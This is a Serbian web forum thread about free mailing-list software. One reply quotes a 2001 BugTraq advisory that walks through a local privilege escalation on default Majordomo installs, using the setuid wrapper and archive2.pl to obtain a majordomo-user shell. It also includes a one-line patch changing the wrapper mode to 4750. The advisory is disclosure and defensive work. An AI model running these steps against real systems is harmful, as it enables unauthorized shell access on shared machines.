Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

softwere za mailing listu

[es] :: Web aplikacije :: softwere za mailing listu

[ Pregleda: 7627 | Odgovora: 12 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Goran Rakić
Beograd

Član broj: 999
Poruke: 3766

Sajt: blog.goranrakic.com


+125 Profil

icon softwere za mailing listu01.10.2001. u 21:59 - pre 214 meseci
treba mi adresa nekog free skripta (php+mySql ili asp+access, ali bolje ovo prvo) za vodjenje mailing liste, znaci prijavljivanje, odjavljivanje SVE...

Help please
http://sr.libreoffice.org — slobodan kancelarijski paket, obrada teksta, tablice,
prezentacije, legalno bez troškova licenciranja
 
Odgovor na temu

Dragoslav Krunić

Član broj: 225
Poruke: 1083
*.verat.net



Profil

icon Re: softwere za mailing listu01.10.2001. u 22:16 - pre 214 meseci
Majordomo
 
Odgovor na temu

Gojko Vujovic
Amsterdam, NL

Administrator
Član broj: 1
Poruke: 13630



+129 Profil

icon Re: softwere za mailing listu01.10.2001. u 22:25 - pre 214 meseci
Minordomo
 
Odgovor na temu

m r v a

Član broj: 8
Poruke: 1843
*.yubc.net



Profil

icon Re: softwere za mailing listu01.10.2001. u 22:27 - pre 214 meseci
Pri tome da se obrati panja na security, posebno ukoliko je maina visekorisnika


Preuzeto sa BUGTRAQ:
ps: na kraju za priloen i patch fajl ...

>>>-------- ISECI ISPOD
To: BugTraq
Subject: Majordomo default vulns
Date: Sep 14 2001 11:24AM
Author: Marco van Berkum <m.v.berkum@obit.nl>

Hi,
I found something to discuss, this time involving majordomo.
This was tested on a Slackware linux 8.0 (kernel 2.4.8);
majordomo version 1.94.4, I also tested the other versions
and all _default_ installs had the same problem, note that
the versions 1.94.1 an 1.94.2 should NOT be used anymore,
those are way more simple to exploit.

We all know that if you install majordomo you should
CAREFULLY read the INSTALL file, simply because else
you will have a security problem. Only I doubt that everyone
actually follows the guidelines. Besides that, I feel that
Majordomodevelopers _could_ make a more secure default
install without affecting the functionality of the program.
A simple patch would _at least_ stop the possiblities which
are descibed below.

Also I did not find in the documents that majordomo should
have a shell (so give it a nologin or whatever, it works fine
without shell).

An example:

Who am i
marco@anubis:~$ id -a
uid=1001(marco) gid=100(users) groups=100(users)

This could happen if you give it a /home/majordomo

marco@anubis:~$ ls -al /home/|grep majordomo
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/

Suidbit + executable for everyone (this is where the patch comes in)

marco@anubis:~$ ls -al ~majordomo/wrapper
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51
/home/majordomo/wrapper*

This is the program I'm going to abuse

marco@anubis:~$ ls -al ~majordomo/archive2.pl
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51
/home/majordomo/archive2.pl*

Make a template

marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test

Append majordomo's .bash_profile (or .profile etc..) with your template
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is,
that one can use /'s, I need wrapper for becoming user majordomo
though).

marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a
~marco/test

Now hit the .bash_profile (sometimes the majordomo admin might need it
and do the same).

marco@anubis:~$ su - majordomo
Password:
majordomo@anubis:~$ id -a
uid=666(majordomo) gid=2(daemon) groups=2(daemon)
majordomo@anubis:~$ exit

See if it worked

marco@anubis:~$ ls -al ~majordomo/sh
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57
/home/majordomo/sh -> /bin/sh*

Jupz it worked, now someone could abuse it, let's do that.

marco@anubis:~$ ~majordomo/wrapper sh
sh-2.05$ id -a
uid=666(majordomo) gid=2(daemon) groups=100(users)
sh-2.05$

Ok, I'm majordomo.

Also, in the README file is described how one could debug majordomo.

<quote>
Finally, if you're up to mucking around in the perl code, symlinking
perl into ~majordomo and invoking it via wrapper will give you a debug
environment with Majordomo's permissions and view of the world:

~majordomo% ./wrapper perl -d majordomo
</quote>

Well, same problem :)
Dont forget to remove the symlink or else everyone can do this:

marco@anubis:~$ /home/majordomo/wrapper perl
system("/bin/sh");
^D
sh-2.04$

One could append the perlfiles to make them execute your evil code of
course since the archive2 program appends. This could give a majordomo
uid/daemon gid shell.

The main point here is that we can write to majordomo owned files to
simply alter data in the lists or score a shell (and obtaining a daemon
gid).
reading the INSTALL file carefully will help you to prevent this, but I
prefer to apply a patch before starting the installation to make sure
that
the wrapper is not executable for everyone (it _should_ have 4750 and
not 4755).

--- simple patch to make default install more secure ---

--- Makefile.orig Fri Sep 14 09:43:45 2001
+++ Makefile Fri Sep 14 09:44:20 2001
@@ -42,7 +42,7 @@
# change these values!
WRAPPER_OWNER = root
WRAPPER_GROUP = $(W_GROUP)
-WRAPPER_MODE = 4755
+WRAPPER_MODE = 4750
POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP)
# Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4,
# HP DomainOS) then comment out the above four lines and uncomment

just my 2 cents,
grtz,
Marco van Berkum
--
GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
G++ e- h+ r y*
+---------------------+------------------+-------------------+
| Marco van Berkum | MB17300-RIPE | Security Engineer |
| http://ws.obit.nl | "Chernobyl used | Network Admin |
| m.v.berkum@obit.nl | Windows" | UNIX |
+---------------------+------------------+-------------------+



<<<<---- KRAJ ISEKA

 
Odgovor na temu

alex
Aleksandar Radulovic
Senior Software Engineer, Spotify
Stockholm, Sweden

Član broj: 71
Poruke: 2194
*.as.mi.is

Jabber: alex@a13x.info
ICQ: -1
Sajt: www.a13x.info


+1 Profil

icon Re: softwere za mailing listu02.10.2001. u 01:55 - pre 214 meseci
Jedna rec - mailman!

Alex: My favorite site is http://localhost/
R.J. Oppenheimer: "I am become death, destroyer of worlds" (1945 AD)
tweet.13x ||
linkedin.13x
 
Odgovor na temu

Abraxas
Ivan Sofronic
Sabac,Beograd

Član broj: 109
Poruke: 61
*.ptt.yu

ICQ: 35803706
Sajt: www.SabacOnlineStudios.co..


Profil

icon Re: softwere za mailing listu02.10.2001. u 10:33 - pre 214 meseci
sto se time toliko zamjavate kad imate yahoogropus....jednostavno do dzadza
 
Odgovor na temu

Dragoslav Krunić

Član broj: 225
Poruke: 1083
*.verat.net



Profil

icon Re: softwere za mailing listu02.10.2001. u 11:50 - pre 214 meseci
Citat:
Abraxas je napisao:
sto se time toliko zamjavate kad imate yahoogropus....jednostavno do dzadza


Pa ja ne znam. da li oni ubacuju reklame?
Uostalom, ovako je sladje, lepse a i ponesto naucis....
Kada bi mi neko dao da biram yahoogroups ili da setujem moju mailing listu, izabrao bih ovo drugo, samo zbog vece slobode.
 
Odgovor na temu

prosams
Novi Beograd

Član broj: 716
Poruke: 133
*.145.EUnet.yu



Profil

icon Re: softwere za mailing listu02.10.2001. u 23:39 - pre 214 meseci
Imam ja ekstra Perl mail listu hsmail.
Imas jedan glavni .pl fajl, variable fajl i mail.txt fajl. Kada udjes u admin sekciju imas jedan veliki text box i kucaj do mile volje.
Naravno mozes i da brises korisnike. I jeb.. one free mail liste, treba ti samo server koji podrzava barem Perl 5.00
Zlo ne postoji, već samo je dobro prisutno u maloj količini.
 
Odgovor na temu

ingglick
Zemun

Član broj: 76668
Poruke: 6
*.rcub.bg.ac.yu.



Profil

icon Re: softwere za mailing listu19.12.2005. u 15:09 - pre 163 meseci
Majordomo, Minordomo i Malone(mailman :) ) traze vise nego sto ja imam na raspolaganju kod hosting provajdera (verat). A to je samo cgi-bin folder i podrsku za perl/php/mysql, nista od usr/local/sbin ili kompajliranje C koda...

Jel moze neko da mi preporuci neku pristojnu skriptu koja radi bilo kako, izgubih se u moru besplatnih skripti, a nemam vremena da sam razvijem, Yahoo Stop!
:)

Hvala unapred...
 
Odgovor na temu

Mracni
Krusevac

Član broj: 47117
Poruke: 52
*.vdial.verat.net.

Sajt: 037ks.com


Profil

icon Re: softwere za mailing listu19.12.2005. u 22:04 - pre 163 meseci
eNewsletter Manager - FREE - Extra prosto za upotrebu, instalira se na kompu, poput e-mail klijenta, sam pravis baze mailova jednostavnim upisom, besplatno je i RADI!

Samo upisi u pretrazivac ime, ne secam se gde sam ga skinuo.
No more lies
 
Odgovor na temu

ingglick
Zemun

Član broj: 76668
Poruke: 6
*.103.EUnet.yu.



Profil

icon Re: softwere za mailing listu19.12.2005. u 22:11 - pre 163 meseci
Hvala na odgovoru, pogledacu, mada mi je naziv vrlo sumnjiv: "eNewsletter Manager" ipak zvuci kao program za Newsletter, a ne za mailing listu.
 
Odgovor na temu

ingglick
Zemun

Član broj: 76668
Poruke: 6
*.rcub.bg.ac.yu.



Profil

icon Re: softwere za mailing listu20.12.2005. u 15:40 - pre 163 meseci
Dodatno pitanje za kolege koji su preporucili, majordomo, minordomo i mailman.

Gde mogu neki od tih skriptova da hostujem?
 
Odgovor na temu

zlatko-kg
Zlatko Stojanovic
Kragujevac

Član broj: 75437
Poruke: 51
*.dialup.neobee.net.

Sajt: www.123rf.com/src_zlatko/..


Profil

icon Re: softwere za mailing listu27.12.2005. u 11:34 - pre 163 meseci
PHPList

http://tincan.co.uk/?lid=294

..
Royalty Free - Stock Image and Photo WWW.SHUTTERSTOCK.COM - WWW.123RF.COM - WWW.DREAMSTIME.COM
 
Odgovor na temu

[es] :: Web aplikacije :: softwere za mailing listu

[ Pregleda: 7627 | Odgovora: 12 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.